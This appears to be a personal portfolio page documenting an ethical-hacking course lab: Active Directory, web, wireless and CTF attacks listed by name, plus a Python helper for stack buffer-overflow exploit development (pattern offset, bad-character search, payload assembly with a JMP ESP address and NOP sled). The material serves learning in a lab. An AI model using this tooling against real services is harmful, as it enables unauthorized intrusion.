
Attacking Networks, Web Applications, CTF Machines, and Exploiting Buffer Overflows

Using VirtualBox, I built an entire penetration testing lab that allowed me to successfully attack Active Directory, web applications, and CTF (capture the flag) machines. Additionally, I conducted exploit development which led to the successful identification and exploitation of a buffer overflow vulnerability. I performed reconnaissance, scanning, and enumeration using: Nmap, Nessus, OWASP Amass, PowerView, Bloodhound, Airodump-ng, directory busting tools, OSINT tools, etc. I attacked Active Directory using: EternalBlue (MS17-010), LLMNR poisoning, SMB relays, IPv6 DNS takeovers, pass-the-pass, pass-the-hash, token impersonation, Kerberoasting, GPP/cPassword attacks, URL file attacks, PrintNightmare (CVE-2021-1675), Mimikatz, Golden Ticket attacks, ZeroLogon, etc. With an emphasis on the OWASP Top 10, I attacked web applications using: SQL injections, XML external entity (XXE) attacks, cross-site scripting (XSS), credential stuffing, password spraying, brute forcing, etc. Along the way, I learned how to use Kali Linux and many other exploitation tools such as Metasploit and Burp Suite.

This was all made possible thanks to this course by TCM Security: Practical Ethical Hacking. Since it is entirely focused on valuable hands-on experience, the course is essentially an entire project that prepares you for a penetration testing job. This page contains my documented progress and learning throughout the entire project/course.

Although I’ve finished the entire project/course, I am extending my learning beyond its scope by continuing to use the penetration testing lab I made to experiment with other new attacks, tools, and tactics.

Overview

I've broken down this project/course into separate parts for easier documentation. Click any of the parts below for more details about what I worked on.

DONE
// Review of prerequisites

Content:
• Computer networking concepts needed for ethical hacking.
• Setting up a Kali Linux attack box via VirtualBox.
• The Linux OS, its terminal, and shell scripting.
• Python.

DONE
// This is where the fun begins!

Content:
• The 5 stages of ethical hacking.
• Setting up a victim box via VirtualBox.
• Reconnaissance / information gathering.
• Scanning and enumeration.
• Exploitation basics.

DONE
// Hacking 5 new victim machines

Content:
• Setting up 5 new victim machines (Linux + Windows) via VirtualBox.
• Compromising all 5 machines.
• Using EternalBlue to exploit the notorious MS17-010 vulnerability.
• Privilege escalation to get root/system access.
• More ethical hacking tools, tactics, and thought processes.

DONE
// Buffer Overflows

Content:
• A deep dive into computer memory and registers to understand how buffer overflows work.
• The buffer overflow exploit development process: debugging programs at the hexadecimal level, spiking and fuzzing, using pattern strings, finding bad characters, identifying vulnerable modules, and more.
• Manually writing buffer overflow exploitation code in Python to gain an administrator shell.
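The three steps above that are pure bookkeeping (locating the EIP offset with a cyclic pattern, finding bad characters, and assembling the final buffer) can be written as small, testable helpers before touching a debugger. The following is an added example written for this page, not the exploit code from the course or from the author; the "target" it talks to is a constructed stand-in that drops NUL, LF and CR, and the JMP ESP address 0x625011AF is an assumed value that in a real engagement comes from the module-hunting step, not from this code.

```python
# Added example (not the page's original exploit): helpers for the pattern-offset,
# bad-character and payload-assembly steps of a classic 32-bit stack overflow.
import struct


def cyclic_pattern(length: int) -> bytes:
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2 ... Zz9) of the given length.
    Every 3-byte triplet is unique over the first 20280 bytes, so any 4-byte
    window that lands in a register maps back to exactly one offset."""
    out = bytearray()
    for upper in range(ord("A"), ord("Z") + 1):
        for lower in range(ord("a"), ord("z") + 1):
            for digit in range(ord("0"), ord("9") + 1):
                out += bytes((upper, lower, digit))
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("requested length exceeds pattern capacity (20280 bytes)")


def pattern_offset(eip_value: int, length: int = 20280) -> int:
    """Given the 32-bit value the crash left in EIP, return its offset in the pattern.
    x86 pushes the return address little-endian, so packing with '<I' recovers the
    four ASCII bytes that overwrote it (0x386F4337 -> b'7Co8')."""
    needle = struct.pack("<I", eip_value)
    offset = cyclic_pattern(length).find(needle)
    if offset < 0:
        raise ValueError(f"{needle!r} not found in pattern")
    return offset


def badchar_string(exclude=(0x00,)) -> bytes:
    """All bytes 0x01..0xFF minus the ones already known to be bad. 0x00 is excluded
    by default because it terminates C strings in almost every target."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def find_badchars(send_fn, exclude=(0x00,)):
    """Iteratively identify bad characters. send_fn(payload) must return the bytes as
    they ended up in the target's memory (what you would read off the ESP dump).
    Only the FIRST mismatch of each round is trusted: a dropped or translated byte
    shifts everything after it, so later differences are re-checked on the next send."""
    bad = list(exclude)
    while True:
        probe = badchar_string(bad)
        seen = send_fn(probe)
        mismatch = next((i for i, (a, b) in enumerate(zip(probe, seen)) if a != b), None)
        if mismatch is None:
            if len(seen) >= len(probe):
                return sorted(bad)
            mismatch = len(seen)  # memory was truncated: the next byte was dropped
        bad.append(probe[mismatch])


def build_payload(offset: int, jmp_esp_addr: int, shellcode: bytes,
                  badchars: bytes, nops: int = 16) -> bytes:
    """Assemble the final buffer: padding up to EIP, the address of a JMP ESP gadget
    (found separately in a module without ASLR/SafeSEH), a NOP sled, then shellcode.
    Refuses to emit a buffer whose address or shellcode contains a known bad char."""
    ret = struct.pack("<I", jmp_esp_addr)
    for name, blob in (("return address", ret), ("shellcode", shellcode)):
        hits = [hex(b) for b in blob if b in badchars]
        if hits:
            raise ValueError(f"{name} contains bad char(s): {hits}")
    return b"A" * offset + ret + b"\x90" * nops + shellcode


def _constructed_target(payload: bytes, dropped=(0x00, 0x0A, 0x0D)) -> bytes:
    """Constructed stand-in for a vulnerable service, NOT a real program: it behaves
    like a line-based parser that strips NUL, LF and CR before copying the buffer."""
    return bytes(b for b in payload if b not in dropped)


if __name__ == "__main__":
    # Constructed crash value: the course-style EIP reading 386F4337 maps to offset 2003.
    off = pattern_offset(0x386F4337)
    bad = find_badchars(_constructed_target)
    # 0x625011AF is an ASSUMED JMP ESP address for illustration only.
    buf = build_payload(off, 0x625011AF, b"\xcc", bytes(bad))
    print(off, [hex(b) for b in bad], len(buf))
```

The bad-character loop deliberately re-sends after every single finding instead of diffing the whole dump once; the one-shot diff is what makes people mark the byte after a real bad char as bad too. Swap `_constructed_target` for a function that sends over a socket and returns the bytes you copy out of the debugger, and the rest is unchanged.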

DONE
// Internal Network Pentesting

Content:
• Setting up an Active Directory pentesting lab environment.
• Initial attack vectors: LLMNR poisoning, capturing hashes, hash cracking, SMB relays, IPv6 DNS takeovers, hacking printers, and popping shells.
• Post-compromise enumeration: PowerView and Bloodhound.
• Post-compromise attacks: pass-the-pass, hash dumping, pass-the-hash, token impersonation, Kerberoasting, GPP/cPassword attacks, URL file attacks, PrintNightmare (CVE-2021-1675), Mimikatz, Golden Ticket attacks, and ZeroLogon.
• Mitigations against Active Directory attacks.

DONE
// The OWASP Top 10

Content:
• Setting up a web application pentesting lab environment.
• Web application enumeration: tools and methods of automation via shell scripting.
• The OWASP Top 10: exploring and abusing the top 10 most critical web app security vulnerabilities.
• Mitigations against the OWASP Top 10.

DONE
// Hacking wireless networks

Content:
• Setting up a wireless network pentesting lab environment.
• What to look for during a wireless pentest assessment.
• Capturing and cracking WPA2 PSK passwords.

